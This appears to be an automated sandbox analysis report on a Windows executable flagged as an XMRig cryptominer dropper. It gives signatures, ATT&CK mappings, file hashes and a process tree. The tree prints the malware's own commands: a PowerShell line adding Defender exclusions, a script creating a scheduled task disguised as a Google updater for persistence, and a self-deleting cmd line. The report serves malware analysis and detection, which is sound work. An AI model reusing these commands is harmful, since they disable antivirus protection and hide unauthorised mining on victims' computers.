Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    374s
  • max time network
    1802s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    25-01-2024 16:55

General

  • Target

    grhsghsGHswgh/xxgg94VsN5GYyJNq.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 29 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1244
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\xxgg94VsN5GYyJNq.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\xxgg94VsN5GYyJNq.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:1868
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1904
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
          3⤵
          • Creates scheduled task(s)
          PID:2160
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\xxgg94VsN5GYyJNq.exe"
        2⤵
        • Deletes itself
        • Suspicious use of WriteProcessMemory
        PID:2684
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2624
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
          3⤵
            PID:1656
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2856
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
            3⤵
            • Creates scheduled task(s)
            PID:2964
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe qtdiqnkejoz
          2⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious behavior: EnumeratesProcesses
          PID:2288
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          PID:1748
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
          2⤵
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:240
        • C:\Windows\System32\conhost.exe
          C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1632
      • C:\Windows\System32\choice.exe
        choice /C Y /N /D Y /T 3
        1⤵
          PID:2600
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {0A226EA5-7083-4466-92ED-71106234570B} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1068
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2960
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic PATH Win32_VideoController GET Name, VideoProcessor
          1⤵
          • Detects videocard installed
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:536

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Execution

        Scheduled Task/Job

        1
        T1053

        Persistence

        Scheduled Task/Job

        1
        T1053

        Privilege Escalation

        Scheduled Task/Job

        1
        T1053

        Discovery

        System Information Discovery

        1
        T1082

        Query Registry

        1
        T1012

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          205KB

          MD5

          1cdca8bced9f02c0e65b3082aa75e3ef

          SHA1

          8d548cfdfe44c31d6d520b117ef15e2f68c49b64

          SHA256

          c0c4c61c4fdde35d8cdb296715f8f3654414233c0ed9e1d1498c6f3ab4f63fa4

          SHA512

          edd62c144b440f227d6973aff77a352a9840465a98e812917c61a9d1eb0729cfd433b9d105a0d606b19876c0ba5d9c126f4689637174286a75dbe9219ece6181

        • C:\Program Files\Google\Chrome\updater.exe
          Filesize

          67KB

          MD5

          a8223c2ef16090cbefd59185479642c7

          SHA1

          455c75632919bb05576313780b869c8b7fc80555

          SHA256

          03523bdd411510754e1365855767dc80b55cf697a4b106ead31b4b7aee066309

          SHA512

          5d2b4c8392e8a84e972e62bc9e9eed398a127565d3092798916097634e0766e59c76e341458821b285d6142694c97f58eafff698a0427327567e1a4c74c48bb6

        • C:\Program Files\Google\Libs\g.log
          Filesize

          198B

          MD5

          37dd19b2be4fa7635ad6a2f3238c4af1

          SHA1

          e5b2c034636b434faee84e82e3bce3a3d3561943

          SHA256

          8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

          SHA512

          86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          77f5dfa7bdcf0afaf2e396877976d734

          SHA1

          7c7adcf8cd6ee1a2ffbb3e8631f3ccd12fbb661d

          SHA256

          05a89dcccee30859577367e8b97f61e29cae694fb9e6135ece99e820b930db70

          SHA512

          b8337be8961a58030ec2e1edbb08a44a7c34c8caa40ae876b505bf9572f9c85608cd9fcfc7c633db5d4218b1b585d4cda796bfa9552f1ddb8c6c915115e5ea99

        • \Program Files\Google\Chrome\updater.exe
          Filesize

          280KB

          MD5

          992664be4922b830208aa36709510a00

          SHA1

          ce6bb72fc6e8b11d3e6ab456a17f5edf20b53794

          SHA256

          62b41f5feddddbef8f52bc359fbd087c96c959519d3acfc31ce8eec9eb7c4841

          SHA512

          1bdeb92cfb4565e4efc30e18d062cc705e3025366093f324af81a6fd0b055ff6f32236c20894cbf0bf0c17cafb63136e2d0149d7e02fcb93fdc4186d0dcc60d2

        • memory/1632-100-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-128-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-118-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-116-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-114-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-122-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-80-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-78-0x00000000007F0000-0x0000000000810000-memory.dmp
          Filesize

          128KB

        • memory/1632-76-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-74-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-72-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-70-0x00000000007F0000-0x0000000000810000-memory.dmp
          Filesize

          128KB

        • memory/1632-69-0x0000000000330000-0x0000000000350000-memory.dmp
          Filesize

          128KB

        • memory/1632-68-0x00000000002B0000-0x00000000002D0000-memory.dmp
          Filesize

          128KB

        • memory/1632-67-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-84-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-130-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-112-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-110-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-108-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-106-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-104-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-120-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-124-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-126-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-82-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-102-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-77-0x0000000000330000-0x0000000000350000-memory.dmp
          Filesize

          128KB

        • memory/1632-90-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-86-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-88-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-92-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-94-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-98-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1632-96-0x0000000140000000-0x00000001407F4000-memory.dmp
          Filesize

          8.0MB

        • memory/1868-0-0x000000013F360000-0x000000013F571000-memory.dmp
          Filesize

          2.1MB

        • memory/1868-29-0x000000013F360000-0x000000013F571000-memory.dmp
          Filesize

          2.1MB

        • memory/1896-50-0x000007FEF4D40000-0x000007FEF56DD000-memory.dmp
          Filesize

          9.6MB

        • memory/1896-51-0x0000000001120000-0x00000000011A0000-memory.dmp
          Filesize

          512KB

        • memory/1896-49-0x0000000001120000-0x00000000011A0000-memory.dmp
          Filesize

          512KB

        • memory/1896-46-0x000007FEF4D40000-0x000007FEF56DD000-memory.dmp
          Filesize

          9.6MB

        • memory/1896-47-0x0000000001120000-0x00000000011A0000-memory.dmp
          Filesize

          512KB

        • memory/1896-48-0x0000000001120000-0x00000000011A0000-memory.dmp
          Filesize

          512KB

        • memory/1896-52-0x000007FEF4D40000-0x000007FEF56DD000-memory.dmp
          Filesize

          9.6MB

        • memory/1904-26-0x0000000002690000-0x0000000002710000-memory.dmp
          Filesize

          512KB

        • memory/1904-27-0x000007FEF4D40000-0x000007FEF56DD000-memory.dmp
          Filesize

          9.6MB

        • memory/1904-24-0x0000000002690000-0x0000000002710000-memory.dmp
          Filesize

          512KB

        • memory/1904-19-0x000000001B240000-0x000000001B522000-memory.dmp
          Filesize

          2.9MB

        • memory/1904-23-0x000007FEF4D40000-0x000007FEF56DD000-memory.dmp
          Filesize

          9.6MB

        • memory/1904-20-0x000007FEF4D40000-0x000007FEF56DD000-memory.dmp
          Filesize

          9.6MB

        • memory/1904-25-0x0000000002690000-0x0000000002710000-memory.dmp
          Filesize

          512KB

        • memory/1904-22-0x0000000001E90000-0x0000000001E98000-memory.dmp
          Filesize

          32KB

        • memory/1904-21-0x0000000002690000-0x0000000002710000-memory.dmp
          Filesize

          512KB

        • memory/2288-71-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2288-75-0x0000000140000000-0x0000000140016000-memory.dmp
          Filesize

          88KB

        • memory/2624-35-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2624-41-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2624-36-0x00000000027A0000-0x0000000002820000-memory.dmp
          Filesize

          512KB

        • memory/2624-37-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2624-38-0x00000000027A0000-0x0000000002820000-memory.dmp
          Filesize

          512KB

        • memory/2624-40-0x00000000027A0000-0x0000000002820000-memory.dmp
          Filesize

          512KB

        • memory/2624-39-0x00000000027A0000-0x0000000002820000-memory.dmp
          Filesize

          512KB

        • memory/2664-10-0x00000000026E0000-0x0000000002760000-memory.dmp
          Filesize

          512KB

        • memory/2664-9-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2664-5-0x000000001B2D0000-0x000000001B5B2000-memory.dmp
          Filesize

          2.9MB

        • memory/2664-6-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2664-8-0x00000000026E0000-0x0000000002760000-memory.dmp
          Filesize

          512KB

        • memory/2664-7-0x0000000001E20000-0x0000000001E28000-memory.dmp
          Filesize

          32KB

        • memory/2664-11-0x00000000026E0000-0x0000000002760000-memory.dmp
          Filesize

          512KB

        • memory/2664-12-0x00000000026E0000-0x0000000002760000-memory.dmp
          Filesize

          512KB

        • memory/2664-13-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2856-59-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2856-58-0x0000000001090000-0x0000000001110000-memory.dmp
          Filesize

          512KB

        • memory/2856-57-0x0000000001090000-0x0000000001110000-memory.dmp
          Filesize

          512KB

        • memory/2856-53-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2856-56-0x0000000001090000-0x0000000001110000-memory.dmp
          Filesize

          512KB

        • memory/2856-55-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp
          Filesize

          9.6MB

        • memory/2856-54-0x0000000001090000-0x0000000001110000-memory.dmp
          Filesize

          512KB

        • memory/2960-66-0x000000013F500000-0x000000013F711000-memory.dmp
          Filesize

          2.1MB

        • memory/2960-45-0x000000013F500000-0x000000013F711000-memory.dmp
          Filesize

          2.1MB